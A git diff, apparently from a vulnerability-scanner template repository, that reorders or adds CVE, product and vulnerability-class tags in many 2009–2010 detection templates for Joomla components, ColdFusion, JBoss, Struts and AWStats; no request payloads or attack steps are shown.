--- a/http/cves/2009/CVE-2009-1872.yaml
+++ b/http/cves/2009/CVE-2009-1872.yaml
@@ -28,7 +28,7 @@ info:
vendor: adobe
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
- tags: cve,cve2009,adobe,xss,coldfusion,tenable
+ tags: cve2009,cve,adobe,xss,coldfusion,tenable
http:
- method: GET
diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml
index 4ca2de61da..85de45277e 100644
--- a/http/cves/2009/CVE-2009-2015.yaml
+++ b/http/cves/2009/CVE-2009-2015.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: joomla
product: joomla
- tags: joomla,lfi,edb,cve,cve2009
+ tags: cve,cve2009,joomla,lfi,edb
http:
- method: GET
diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml
index 57cfc09f72..9d908c42f6 100644
--- a/http/cves/2009/CVE-2009-2100.yaml
+++ b/http/cves/2009/CVE-2009-2100.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: joomla
product: joomla
- tags: cve,cve2009,joomla,lfi,edb
+ tags: cve2009,cve,joomla,lfi,edb
http:
- method: GET
diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml
index af5743455d..620634b5d2 100644
--- a/http/cves/2009/CVE-2009-3053.yaml
+++ b/http/cves/2009/CVE-2009-3053.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: joomla
product: joomla
- tags: cve,cve2009,joomla,lfi,edb
+ tags: cve2009,cve,joomla,lfi,edb
http:
- method: GET
diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml
index 0500d83687..371369eac8 100644
--- a/http/cves/2009/CVE-2009-3318.yaml
+++ b/http/cves/2009/CVE-2009-3318.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: joomla
product: joomla
- tags: joomla,lfi,edb,cve,cve2009
+ tags: cve2009,cve,joomla,lfi,edb
http:
- method: GET
diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml
index a3da99748f..2b991b2b87 100644
--- a/http/cves/2009/CVE-2009-4202.yaml
+++ b/http/cves/2009/CVE-2009-4202.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: joomla
product: joomla\!
- tags: cve2009,joomla,lfi,photo,edb,cve
+ tags: cve,cve2009,joomla,lfi,photo,edb
http:
- method: GET
diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml
index be572176b2..0f09d1aa2c 100644
--- a/http/cves/2009/CVE-2009-4679.yaml
+++ b/http/cves/2009/CVE-2009-4679.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: inertialfate
product: com_if_nexus
- tags: cve,cve2009,joomla,lfi,nexus,edb,inertialfate
+ tags: cve2009,cve,joomla,lfi,nexus,edb,inertialfate
http:
- method: GET
diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml
index 08a8e291fd..914859a2bc 100644
--- a/http/cves/2009/CVE-2009-5020.yaml
+++ b/http/cves/2009/CVE-2009-5020.yaml
@@ -23,7 +23,7 @@ info:
max-request: 2
vendor: awstats
product: awstats
- tags: cve,cve2009,redirect,awstats
+ tags: cve2009,cve,redirect,awstats
http:
- method: GET
diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml
index 4fcbcb99ec..828cbe50c7 100644
--- a/http/cves/2009/CVE-2009-5114.yaml
+++ b/http/cves/2009/CVE-2009-5114.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: iwork
product: webglimpse
- tags: edb,cve,cve2009,lfi,iwork
+ tags: cve,cve2009,edb,lfi,iwork
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml
index 47a5d2a53f..f4e3588f3d 100644
--- a/http/cves/2010/CVE-2010-0157.yaml
+++ b/http/cves/2010/CVE-2010-0157.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: joomla
product: joomla\!
- tags: cve,cve2010,joomla,lfi,edb,packetstorm
+ tags: cve2010,cve,joomla,lfi,edb,packetstorm
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml
index 3c83303be4..fa885aa70a 100644
--- a/http/cves/2010/CVE-2010-0467.yaml
+++ b/http/cves/2010/CVE-2010-0467.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: chillcreations
product: com_ccnewsletter
- tags: cve,cve2010,joomla,lfi,edb,chillcreations
+ tags: cve2010,cve,joomla,lfi,edb,chillcreations
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml
index 2102ec0059..009385fa4b 100644
--- a/http/cves/2010/CVE-2010-0696.yaml
+++ b/http/cves/2010/CVE-2010-0696.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: joomlaworks
product: jw_allvideos
- tags: cve,cve2010,joomla,lfi,edb,joomlaworks
+ tags: cve2010,cve,joomla,lfi,edb,joomlaworks
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml
index d8d2e8e160..43f42587bb 100644
--- a/http/cves/2010/CVE-2010-0942.yaml
+++ b/http/cves/2010/CVE-2010-0942.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: jvideodirect
product: com_jvideodirect
- tags: cve2010,joomla,lfi,edb,packetstorm,cve,jvideodirect
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm,jvideodirect
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml
index e423797e96..e0bec5f437 100644
--- a/http/cves/2010/CVE-2010-0943.yaml
+++ b/http/cves/2010/CVE-2010-0943.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: joomlart
product: com_jashowcase
- tags: cve2010,joomla,lfi,edb,cve,joomlart
+ tags: cve,cve2010,joomla,lfi,edb,joomlart
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml
index b9411f790a..99c80222ec 100644
--- a/http/cves/2010/CVE-2010-0944.yaml
+++ b/http/cves/2010/CVE-2010-0944.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: thorsten_riess
product: com_jcollection
- tags: cve2010,joomla,lfi,edb,packetstorm,cve,thorsten_riess
+ tags: cve2010,cve,joomla,lfi,edb,packetstorm,thorsten_riess
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml
index af6e5f85dd..99094d5719 100644
--- a/http/cves/2010/CVE-2010-0972.yaml
+++ b/http/cves/2010/CVE-2010-0972.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: g4j.laoneo
product: com_gcalendar
- tags: edb,cve,cve2010,joomla,lfi
+ tags: cve2010,cve,edb,joomla,lfi,g4j.laoneo
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml
index 16da120308..4cad3f2a75 100644
--- a/http/cves/2010/CVE-2010-0982.yaml
+++ b/http/cves/2010/CVE-2010-0982.yaml
@@ -23,7 +23,7 @@ info:
max-request: 1
vendor: joomlamo
product: com_cartweberp
- tags: cve,cve2010,joomla,lfi,edb,joomlamo
+ tags: cve2010,cve,joomla,lfi,edb,joomlamo
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml
index e19aab2f21..a62fc10459 100644
--- a/http/cves/2010/CVE-2010-0985.yaml
+++ b/http/cves/2010/CVE-2010-0985.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: chris_simon
product: com_abbrev
- tags: cve,cve2010,joomla,lfi,edb
+ tags: cve,cve2010,joomla,lfi,edb,chris_simon
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml
index 5bbe680253..1496cfa4f8 100644
--- a/http/cves/2010/CVE-2010-1217.yaml
+++ b/http/cves/2010/CVE-2010-1217.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: je_form_creator
product: je_form_creator
- tags: edb,packetstorm,cve,cve2010,joomla,lfi,plugin,je_form_creator
+ tags: cve,cve2010,edb,packetstorm,joomla,lfi,plugin,je_form_creator
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml
index 07a22db236..db8f4a870e 100644
--- a/http/cves/2010/CVE-2010-1302.yaml
+++ b/http/cves/2010/CVE-2010-1302.yaml
@@ -23,7 +23,7 @@ info:
max-request: 1
vendor: decryptweb
product: com_dwgraphs
- tags: edb,cve,cve2010,joomla,lfi,graph,decryptweb
+ tags: cve,cve2010,edb,joomla,lfi,graph,decryptweb
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml
index 4b1079360d..a4eb35d020 100644
--- a/http/cves/2010/CVE-2010-1304.yaml
+++ b/http/cves/2010/CVE-2010-1304.yaml
@@ -23,7 +23,7 @@ info:
max-request: 1
vendor: joomlamo
product: com_userstatus
- tags: cve2010,joomla,lfi,status,edb,cve,joomlamo
+ tags: cve,cve2010,joomla,lfi,status,edb,joomlamo
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml
index 4b9c11b144..3ad7c72828 100644
--- a/http/cves/2010/CVE-2010-1305.yaml
+++ b/http/cves/2010/CVE-2010-1305.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: joomlamo
product: com_jinventory
- tags: joomla,lfi,edb,cve,cve2010,joomlamo
+ tags: cve,cve2010,joomla,lfi,edb,joomlamo
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml
index 360c5c2c26..8451f2814f 100644
--- a/http/cves/2010/CVE-2010-1307.yaml
+++ b/http/cves/2010/CVE-2010-1307.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: software.realtyna
product: com_joomlaupdater
- tags: edb,cve,cve2010,joomla,lfi,software.realtyna
+ tags: cve,cve2010,edb,joomla,lfi,software.realtyna
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml
index fb3b2be6e3..2de97fecba 100644
--- a/http/cves/2010/CVE-2010-1312.yaml
+++ b/http/cves/2010/CVE-2010-1312.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: ijoomla
product: com_news_portal
- tags: cve,cve2010,joomla,lfi,edb,packetstorm,ijoomla
+ tags: cve2010,cve,joomla,lfi,edb,packetstorm,ijoomla
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml
index 6b7a0166ed..1e5da0b5e7 100644
--- a/http/cves/2010/CVE-2010-1314.yaml
+++ b/http/cves/2010/CVE-2010-1314.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: joomlanook
product: com_hsconfig
- tags: lfi,edb,packetstorm,cve,cve2010,joomla,joomlanook
+ tags: cve,cve2010,lfi,edb,packetstorm,joomla,joomlanook
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml
index bc54569366..8c17bd50ac 100644
--- a/http/cves/2010/CVE-2010-1340.yaml
+++ b/http/cves/2010/CVE-2010-1340.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: joomla-research
product: com_jresearch
- tags: cve2010,joomla,lfi,edb,packetstorm,cve,joomla-research
+ tags: cve2010,cve,joomla,lfi,edb,packetstorm,joomla-research
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml
index 50c58cc2fc..5aa011f473 100644
--- a/http/cves/2010/CVE-2010-1345.yaml
+++ b/http/cves/2010/CVE-2010-1345.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: cookex
product: com_ckforms
- tags: lfi,edb,cve,cve2010,joomla,cookex
+ tags: cve2010,cve,lfi,edb,joomla,cookex
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml
index 89fc3bed5a..252d03059f 100644
--- a/http/cves/2010/CVE-2010-1429.yaml
+++ b/http/cves/2010/CVE-2010-1429.yaml
@@ -30,7 +30,7 @@ info:
vendor: redhat
product: jboss_enterprise_application_platform
shodan-query: title:"JBoss"
- tags: cve,cve2010,jboss,eap,tomcat,exposure,redhat
+ tags: cve2010,cve,jboss,eap,tomcat,exposure,redhat
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml
index f9902c7043..92f80f33a7 100644
--- a/http/cves/2010/CVE-2010-1469.yaml
+++ b/http/cves/2010/CVE-2010-1469.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: ternaria
product: com_jprojectmanager
- tags: lfi,edb,packetstorm,cve,cve2010,joomla,ternaria
+ tags: cve,cve2010,lfi,edb,packetstorm,joomla,ternaria
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml
index 3dcaccf62e..a324c1dd2b 100644
--- a/http/cves/2010/CVE-2010-1470.yaml
+++ b/http/cves/2010/CVE-2010-1470.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: dev.pucit.edu.pk
product: com_webtv
- tags: cve2010,joomla,lfi,edb,cve,dev.pucit.edu.pk
+ tags: cve,cve2010,joomla,lfi,edb,dev.pucit.edu.pk
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml
index e41af7fe09..83c4291e0c 100644
--- a/http/cves/2010/CVE-2010-1473.yaml
+++ b/http/cves/2010/CVE-2010-1473.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: johnmccollum
product: com_advertising
- tags: joomla,lfi,edb,packetstorm,cve,cve2010,johnmccollum
+ tags: cve2010,cve,joomla,lfi,edb,packetstorm,johnmccollum
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml
index a14291eb9c..0a4d11ac87 100644
--- a/http/cves/2010/CVE-2010-1474.yaml
+++ b/http/cves/2010/CVE-2010-1474.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: supachai_teasakul
product: com_sweetykeeper
- tags: cve,cve2010,joomla,lfi,edb,supachai_teasakul
+ tags: cve2010,cve,joomla,lfi,edb,supachai_teasakul
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml
index ff03ca3d3b..093505a471 100644
--- a/http/cves/2010/CVE-2010-1475.yaml
+++ b/http/cves/2010/CVE-2010-1475.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: ternaria
product: com_preventive
- tags: edb,cve,cve2010,joomla,lfi,ternaria
+ tags: cve,cve2010,edb,joomla,lfi,ternaria
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml
index 814bae2adc..093f4c2859 100644
--- a/http/cves/2010/CVE-2010-1476.yaml
+++ b/http/cves/2010/CVE-2010-1476.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: alphaplug
product: com_alphauserpoints
- tags: joomla,lfi,edb,packetstorm,cve,cve2010,alphaplug
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm,alphaplug
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml
index 7ee62cea87..510a72af22 100644
--- a/http/cves/2010/CVE-2010-1491.yaml
+++ b/http/cves/2010/CVE-2010-1491.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: mms.pipp
product: com_mmsblog
- tags: cve2010,joomla,lfi,edb,packetstorm,cve,mms.pipp
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm,mms.pipp
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml
index 94e5906378..8497107bdf 100644
--- a/http/cves/2010/CVE-2010-1495.yaml
+++ b/http/cves/2010/CVE-2010-1495.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: matamko
product: com_matamko
- tags: cve2010,joomla,lfi,edb,packetstorm,cve,matamko
+ tags: cve2010,cve,joomla,lfi,edb,packetstorm,matamko
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml
index fbed245fbe..ac9063c570 100644
--- a/http/cves/2010/CVE-2010-1531.yaml
+++ b/http/cves/2010/CVE-2010-1531.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: redcomponent
product: com_redshop
- tags: lfi,edb,packetstorm,cve,cve2010,joomla,redcomponent
+ tags: cve2010,cve,lfi,edb,packetstorm,joomla,redcomponent
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml
index 48855c5b76..74ad6d92e3 100644
--- a/http/cves/2010/CVE-2010-1533.yaml
+++ b/http/cves/2010/CVE-2010-1533.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: peter_hocherl
product: com_tweetla
- tags: cve2010,joomla,lfi,edb,cve,peter_hocherl
+ tags: cve2010,cve,joomla,lfi,edb,peter_hocherl
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml
index b6947cdc5a..8eb565613c 100644
--- a/http/cves/2010/CVE-2010-1534.yaml
+++ b/http/cves/2010/CVE-2010-1534.yaml
@@ -23,7 +23,7 @@ info:
max-request: 1
vendor: joomla.batjo
product: com_shoutbox
- tags: joomla,lfi,edb,cve,cve2010,joomla.batjo
+ tags: cve2010,cve,joomla,lfi,edb,joomla.batjo
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml
index 34368ce661..3cb6e9ad64 100644
--- a/http/cves/2010/CVE-2010-1535.yaml
+++ b/http/cves/2010/CVE-2010-1535.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: peter_hocherl
product: com_travelbook
- tags: cve,cve2010,joomla,lfi,edb
+ tags: cve,cve2010,joomla,lfi,edb,peter_hocherl
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml
index 4b8bb4fcc0..dc12659411 100644
--- a/http/cves/2010/CVE-2010-1540.yaml
+++ b/http/cves/2010/CVE-2010-1540.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: myblog
product: com_myblog
- tags: cve,cve2010,joomla,lfi,edb,myblog
+ tags: cve2010,cve,joomla,lfi,edb,myblog
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml
index b816c6afbb..f805aa5e77 100644
--- a/http/cves/2010/CVE-2010-1601.yaml
+++ b/http/cves/2010/CVE-2010-1601.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: joomlamart
product: com_jacomment
- tags: cve2010,joomla,lfi,edb,packetstorm,cve,joomlamart
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm,joomlamart
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml
index 58616861ae..cab5eb3673 100644
--- a/http/cves/2010/CVE-2010-1602.yaml
+++ b/http/cves/2010/CVE-2010-1602.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: zimbllc
product: com_zimbcomment
- tags: lfi,edb,packetstorm,cve,cve2010,joomla,zimbllc
+ tags: cve,cve2010,lfi,edb,packetstorm,joomla,zimbllc
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml
index 35dedf0ded..1261663fd6 100644
--- a/http/cves/2010/CVE-2010-1603.yaml
+++ b/http/cves/2010/CVE-2010-1603.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: zimbllc
product: com_zimbcore
- tags: cve2010,joomla,lfi,edb,cve,zimbllc
+ tags: cve,cve2010,joomla,lfi,edb,zimbllc
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml
index 58c66e492b..9d41439bb2 100644
--- a/http/cves/2010/CVE-2010-1653.yaml
+++ b/http/cves/2010/CVE-2010-1653.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: htmlcoderhelper
product: com_graphics
- tags: edb,packetstorm,cve,cve2010,joomla,lfi,htmlcoderhelper
+ tags: cve,cve2010,edb,packetstorm,joomla,lfi,htmlcoderhelper
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml
index 92ade001f1..5734df2dca 100644
--- a/http/cves/2010/CVE-2010-1659.yaml
+++ b/http/cves/2010/CVE-2010-1659.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: webkul
product: com_ultimateportfolio
- tags: cve2010,joomla,lfi,edb,cve,webkul
+ tags: cve2010,cve,joomla,lfi,edb,webkul
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml
index dcbb468c6a..c81c038657 100644
--- a/http/cves/2010/CVE-2010-1714.yaml
+++ b/http/cves/2010/CVE-2010-1714.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: dev.pucit.edu.pk
product: com_arcadegames
- tags: cve,cve2010,joomla,lfi,edb,packetstorm,dev.pucit.edu.pk
+ tags: cve2010,cve,joomla,lfi,edb,packetstorm,dev.pucit.edu.pk
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml
index 13f85de33e..5b1e4d3d57 100644
--- a/http/cves/2010/CVE-2010-1715.yaml
+++ b/http/cves/2010/CVE-2010-1715.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: pucit.edu
product: com_onlineexam
- tags: joomla,lfi,edb,packetstorm,cve,cve2010,pucit.edu
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm,pucit.edu
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml
index b7b8c9a375..34517db7ad 100644
--- a/http/cves/2010/CVE-2010-1717.yaml
+++ b/http/cves/2010/CVE-2010-1717.yaml
@@ -26,7 +26,7 @@ info:
vendor: if_surfalert_project
product: if_surfalert
framework: joomla\!
- tags: cve2010,joomla,lfi,edb,cve,if_surfalert_project,joomla\!
+ tags: cve,cve2010,joomla,lfi,edb,if_surfalert_project,joomla\!
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml
index 0851ce5cd1..4786816e23 100644
--- a/http/cves/2010/CVE-2010-1719.yaml
+++ b/http/cves/2010/CVE-2010-1719.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: moto-treks
product: com_mtfireeagle
- tags: lfi,edb,cve,cve2010,joomla,moto-treks
+ tags: cve2010,cve,lfi,edb,joomla,moto-treks
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml
index 09c267dabe..29ebb0cf88 100644
--- a/http/cves/2010/CVE-2010-1858.yaml
+++ b/http/cves/2010/CVE-2010-1858.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: gelembjuk
product: com_smestorage
- tags: cve2010,joomla,lfi,edb,packetstorm,cve,gelembjuk
+ tags: cve2010,cve,joomla,lfi,edb,packetstorm,gelembjuk
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml
index 3bbf52e59f..c013c79fc7 100644
--- a/http/cves/2010/CVE-2010-1870.yaml
+++ b/http/cves/2010/CVE-2010-1870.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: apache
product: struts
- tags: packetstorm,edb,cve,cve2010,rce,listserv,ognl,apache
+ tags: cve,cve2010,packetstorm,edb,rce,listserv,ognl,apache
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml
index 56261b336d..ce056889a1 100644
--- a/http/cves/2010/CVE-2010-1875.yaml
+++ b/http/cves/2010/CVE-2010-1875.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: com-property
product: com_properties
- tags: cve,cve2010,joomla,lfi,edb,com-property
+ tags: cve2010,cve,joomla,lfi,edb,com-property
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml
index 62426ab49f..77a8b1dd61 100644
--- a/http/cves/2010/CVE-2010-1878.yaml
+++ b/http/cves/2010/CVE-2010-1878.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: blueflyingfish.no-ip
product: com_orgchart
- tags: lfi,edb,packetstorm,cve,cve2010,joomla,blueflyingfish.no-ip
+ tags: cve,cve2010,lfi,edb,packetstorm,joomla,blueflyingfish.no-ip
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml
index 8c32ba2958..a1a33d4b45 100644
--- a/http/cves/2010/CVE-2010-1953.yaml
+++ b/http/cves/2010/CVE-2010-1953.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: joomlacomponent.inetlanka
product: com_multimap
- tags: cve2010,joomla,lfi,edb,cve,joomlacomponent.inetlanka
+ tags: cve,cve2010,joomla,lfi,edb,joomlacomponent.inetlanka
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml
index 56407a3b7c..29c94701e0 100644
--- a/http/cves/2010/CVE-2010-1954.yaml
+++ b/http/cves/2010/CVE-2010-1954.yaml
@@ -23,7 +23,7 @@ info:
max-request: 1
vendor: joomlacomponent.inetlanka
product: com_multiroot
- tags: edb,cve,cve2010,joomla,lfi,joomlacomponent.inetlanka
+ tags: cve,cve2010,edb,joomla,lfi,joomlacomponent.inetlanka
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml
index 9eb526f467..2d73e75cef 100644
--- a/http/cves/2010/CVE-2010-1955.yaml
+++ b/http/cves/2010/CVE-2010-1955.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: thefactory
product: com_blogfactory
- tags: lfi,edb,cve,cve2010,joomla,thefactory
+ tags: cve,cve2010,lfi,edb,joomla,thefactory
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml
index 1b512a94d8..0fec967930 100644
--- a/http/cves/2010/CVE-2010-1956.yaml
+++ b/http/cves/2010/CVE-2010-1956.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: thefactory
product: com_gadgetfactory
- tags: joomla,lfi,edb,cve,cve2010,thefactory
+ tags: cve,cve2010,joomla,lfi,edb,thefactory
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml
index 0a9bca3a17..13a9a09852 100644
--- a/http/cves/2010/CVE-2010-1957.yaml
+++ b/http/cves/2010/CVE-2010-1957.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: thefactory
product: com_lovefactory
- tags: lfi,edb,packetstorm,cve,cve2010,joomla,thefactory
+ tags: cve,cve2010,lfi,edb,packetstorm,joomla,thefactory
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml
index 184d1cd462..3366198b36 100644
--- a/http/cves/2010/CVE-2010-1977.yaml
+++ b/http/cves/2010/CVE-2010-1977.yaml
@@ -23,7 +23,7 @@ info:
max-request: 1
vendor: gohigheris
product: com_jwhmcs
- tags: edb,cve,cve2010,joomla,lfi,gohigheris
+ tags: cve2010,cve,edb,joomla,lfi,gohigheris
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml
index c2e68854c0..63709744fd 100644
--- a/http/cves/2010/CVE-2010-1979.yaml
+++ b/http/cves/2010/CVE-2010-1979.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: affiliatefeeds
product: com_datafeeds
- tags: edb,cve,cve2010,joomla,lfi,affiliatefeeds
+ tags: cve,cve2010,edb,joomla,lfi,affiliatefeeds
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml
index 25c1b9eabf..93dde4a91c 100644
--- a/http/cves/2010/CVE-2010-1980.yaml
+++ b/http/cves/2010/CVE-2010-1980.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: roberto_aloi
product: com_joomlaflickr
- tags: lfi,edb,packetstorm,cve,cve2010,joomla,roberto_aloi
